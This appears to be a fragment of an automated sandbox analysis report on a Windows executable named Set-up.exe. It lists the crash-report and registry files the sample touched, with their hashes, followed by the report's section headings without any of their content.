C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_msedge.exe_b2183e612ae09e2d847ad213d2fdf44b96d97240_75709460_ce6506a8-9fc7-42cc-ba07-4b1639dcbce0\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	2F9C24D6D915D080F770CB33F46CA33E	1CFB5F176B1F0647C3E5064CB96D413CA3EB37C9	4C077834300A46CDAA5E9323A4D9BC97AA9D9ECA9EEA9D11326824C394D25DB3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B32.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:31 2025, 0x1205a4 type	4CA1265DF41FBDA355B15B4B24FFED25	245F096C766E94173C9899644B249173D2DDF8C3	4EDB889F9B0412828B36E721CB6A383D4891E84EC380628A1986DB50646C3E61
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BA0.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	DE2F62C50EDEE70C3F3A10DB35E62479	D875FC94672278F50FC27FEC9477BB3F90AA1527	C8F17FC8248543CE0E6FB62C44D46CA284858FDE588D0879A39835C05763436A
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6BDF.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	97ACE88D7050A4FAAE64C4FEAE48B3DC	FF7C9AD2056A4692DCD80E86551C492896C371F3	940CA3E51E37DC57B1DAD629485062CBCC6C1264B117761C3D7A3A33E7C33865
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7071.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:32 2025, 0x1205a4 type	FF0F5EB26F2D281FD48C47DBB3ED3840	63C58CC543C353CD78B59CF4726D3D9956A0206F	A2C30F9AA7A3A7EC007E79C447A8F7121DE7EC374120C5F6AF886E684965DF8D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER70B1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	9A5636EF186B0DAFD1179E16E8F935F0	5B1D29273274E24944DAD8E52FDAE6E2297AC335	841418EDC9391BD7EFFA6FCBC67E0ED0D19F9761A1D4728D51D63B8F1DBFB17B
C:\ProgramData\Microsoft\Windows\WER\Temp\WER70E1.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	8CFB90222571467BAF50D9A3F4A5F273	289272EAB1811C986FF2603B9F4A235F5096AD7A	75EBB1E518B8D31FC97341319D249FBC31175EDE4E88FD1319DD7E42C2E7893C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7757.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:34 2025, 0x1205a4 type	011FC812627162BE422E79DD3F8FE184	F4411254663AC251E5DF6D65FD427492A3F0E7AB	0C084FABDE305C12142B677012101D81F91555AB468C5205FA26297901A4FF99
C:\ProgramData\Microsoft\Windows\WER\Temp\WER77C5.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	D4AD5514078B3A2422B60119FA129487	313643E8FE6A3DD386C14AD6BEDED1193EB225B3	A038EEC8FA1999A01949D82C1D722E2619F60FBCBE6725E56FF9C1E457523A34
C:\ProgramData\Microsoft\Windows\WER\Temp\WER77F5.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7F8C1333A61B7CF2E76060E11E45B3BB	CF604AFA10CE7440B87ECE8E15A56A7B872E558D	7F8AADBBA1AF47996249B0E8B717385926E8C84D0FA64FBCF12A5186C0134DEA
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7B8D.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:35 2025, 0x1205a4 type	2210130CFA245BBF83BFCCAE222AC57C	8E97E0AF22C3B891E0537122C11FD71987E62EEE	7A721839A86E7719378B3D4E7B0832310AD12F580B2239E31E638422CA5DCFD7
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7BCD.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	8F17A42F4D2DB2CF2EDA0AB2233D3461	5C405E764710A89550553D75DBF27273D05E533A	36C74538F5E99C2D34F041009FE183BDA5416A891DFE33619130A11DF522D403
C:\ProgramData\Microsoft\Windows\WER\Temp\WER7C0C.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	20F189160472B70E7BB334F66F8B2DCB	D49E17D62ED05BF0EBDF586420F56D3D16A59BCA	595AB0BEC4BA78D2B41C5C9432E8E77DEAE4C70DAFC13DF490133D93F31643C7
C:\ProgramData\Microsoft\Windows\WER\Temp\WER89B6.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:39 2025, 0x1205a4 type	90D1B53FBFF2B85189B973B1D014BB20	236E22FD46A8E32F0A649C887993425F35F72598	A8B6AE156466CB63A6148A1AA15DD883682ECFCCB2084531514896549ABCA685
C:\ProgramData\Microsoft\Windows\WER\Temp\WER89F6.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	973CBAB2EBAC10BA8829DA3929C06310	0F201088F74B3A4F5565A69F153CF7F104A54D4A	8B6D4274B716D123D00CE66104A9F564AB19D6CEC2C37F1E378FCB0BFB054809
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8A25.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	D3C1D0C14B14C4F77B1720A95DC9D5E1	54D97FB63FBE1584AB95387FD8923F036336BA57	DD9F2E2D74348E62355670C45C5DCC06A3DFAF22105C37A9911D58900DE9B4E3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8BAA.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:39 2025, 0x1205a4 type	17D920E2702C611CBAEEE6931BD1613D	260551791710118926A4FCFD37C932689FF8EDCE	F80A6BC23C2235B0CB6575C65ADB7BAA62A1B2DFABE1D43794890B51BE0B7B69
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C09.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	F98E4689BEAB519F38BEB81AE467D370	787011E8F9E06AE35A18CB77DB024C5934E8680C	01E1FF5D46BB181EA5C3CDA88A32829627EC60D34DE4AD3D07069D022E6A4362
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8C29.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	D7F23C9448D42FEB496394BF3274F9C7	CA49FF1E53FE4EC95D972CF424A433C53405B644	3006C069BD02B5C7515434769C9CB550A9C5F899188B24E9133B16661BB7C40D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER90DA.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:40 2025, 0x1205a4 type	05176341ADF34FC1B9F37DA4F2213907	7865F333BF5E9E60BA6A33D672E6F5B76C57EA1C	8AA57F2697FEA98E5729F3ABA1AD337D1CB12A0FEB6EE8E38EC1A1B92B16F38C
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9129.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	67236BBF47CB336F5B175393BD47A9DE	E1EC52B09DB3CEE5F477D134435A370E9690BA00	CC06A2470BF11872B051EB59E5B235F5CF5442D7F9C725470D3E59788B508A42
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9188.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	4E4A8CAA2B34A862284216F119AD23BB	EC007F18054A7F8F4EC59E30B86D9B540DC94ACD	4EA5E6BFCD36C82B7079C664AB8469E92D20B08B1D0AE9FF57F5163B7FB74049
C:\ProgramData\Microsoft\Windows\WER\Temp\WER938A.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:41 2025, 0x1205a4 type	58D1409E268AD2CC7D6EDA739E62996B	83C0D56E8AABCF1DAC8A4EDE0E97902859107ABA	3A6E60EAF78E7A7D451FE843E1108D3CBD93E0DF0AC6EED4F0CF9002B06F64C1
C:\ProgramData\Microsoft\Windows\WER\Temp\WER93C9.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	1658743D7D8383024F68A639DC7BA6C8	B0E36427E65EF99D7534EA8A0327D85AAB86EB88	BEE3E49464AC0FF2BD8174D761948F39AA628044797D017B9622581A14E8E42D
C:\ProgramData\Microsoft\Windows\WER\Temp\WER9428.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	28DF7A5657C6C193720360417C91551B	74013545E98EACF40D0A178AEC7A921DEF6A3A5B	2C2EE4D4B4946A52C58F1B24F04B94148A31D5F257F20C55D4A340B719350E1A
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA53D.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:46 2025, 0x1205a4 type	70207940B3F147458BC63F5FD9D230EB	4EA98A663DF66A0844923F766A877559D3ABAA6F	510C5C96CC4F3E94E0B2B9BB79F9A1E52936302D46C125DD6CC60E505CE1DBA4
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA58C.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	FCD7EB68BBE637F5C7CE5A47CC977386	9CA49E8361A6682201FA867D208D040238578AD5	002BA40C9EE9A89D04EBF9FB2094C29E38CCBA60346C256649F6F1FCA9D9FAD8
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA5BC.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	2454BB8BA39DAC11F01F48F1CE732CCA	3CE4718687D6188AD66A2EEFB27AD314A718AE01	F985B76C1FBBFEF637D1387CEF12FAB13C019A30048167871A547FD969B14887
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA992.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:47 2025, 0x1205a4 type	7E2F3FBBE5137F0FF29C1C0351B2CAA1	417F3F349CE31A51052F34F42ECB3DFA7B093F90	3E3B36FB335A9895D32F02002AFA18834566A897EB63D059AC9143A9EDFA46E6
C:\ProgramData\Microsoft\Windows\WER\Temp\WERA9F1.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	73D4EFB28B7719EEB04B640C2A1313C1	96CA71772713D58E29C392176C2104F7C2DF3FA3	EA515C9B67C93C61F9245FC98DAC931BD5D7336BBAEFEA13452B9B60EB85D8E5
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA21.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	03240348204806968EF37079A15BE1A2	5524E8D64E6E2228E1A0624E7E0CFD870DDCC6A9	D51C42A7600B87C65D6BD17AF4AB9934888530706D9133D0DE4FDDD9774155B5
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB105.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:49 2025, 0x1205a4 type	9C1AF0EA8D29E41B4ECEE9C552FE4385	1E6819F5DE2859E37E16AB5B5CD2F29169B8907F	B3ACE26F40C3854C3C9F603D7D7BB3134A6ACA891F09D24E43D41142A73BC0BD
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB134.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	365CB285D3F2355E2AA256A8437FC9E5	A99987F5E73F1EA337EAAC48943DC3DACB888963	E2F2753B8A76B636A7E653888B1C598B3D7B4D1857F5C4839CE8E0392DB9516A
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB155.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	A00999D781994A9DA2C2EF2BE37A7A3E	4E2C214FFC48ADB2C7424BD806B1E7D2B09B9D88	D39166C10437D2ACD7CC21781A050756852986AB054576D427920B4D0888CC8B
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB51B.tmp.dmp	Mini DuMP crash report, 14 streams, Sat May 10 06:05:50 2025, 0x1205a4 type	625BD1D6AEBF8C2B818D11E30750C4A6	BDCA862D60E4CDB5A16D0974728E673489ED8494	84F3C9231FCCC353333CEDD2FB38C318D845B416176CD6BFA3668A8294B732B6
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB599.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	7C175BF1960259C7CE1116B432FCAEBC	01F32877223FC9E020B45B99AE8A774143F19679	B631CB60586C2B634E9B9C01AAFBC2A2C67E751111B3A7870214EA6D3AE3556B
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5F8.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	95E3DDFEDD7A12D261FE94227FFD6576	00AD1CA0D2B837C9D4BC6BBC0652842F538C1CE5	DABF2496A167FDC64B53E51C7EC79F58BE2880743C168D584E7425AE471F2EDA
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	FA655CC5F368654AE6219F43AE62AD85	5AB65D4C4F5F563B13D4769342722C615E1B658E	CF7AFBF8761B28F9F3D99D12F8330D2FF0E7CFBFF903C503763E9A7338F9A048

Windows Analysis Report
Set-up.exe

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Set-up.exe

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Set-up.exe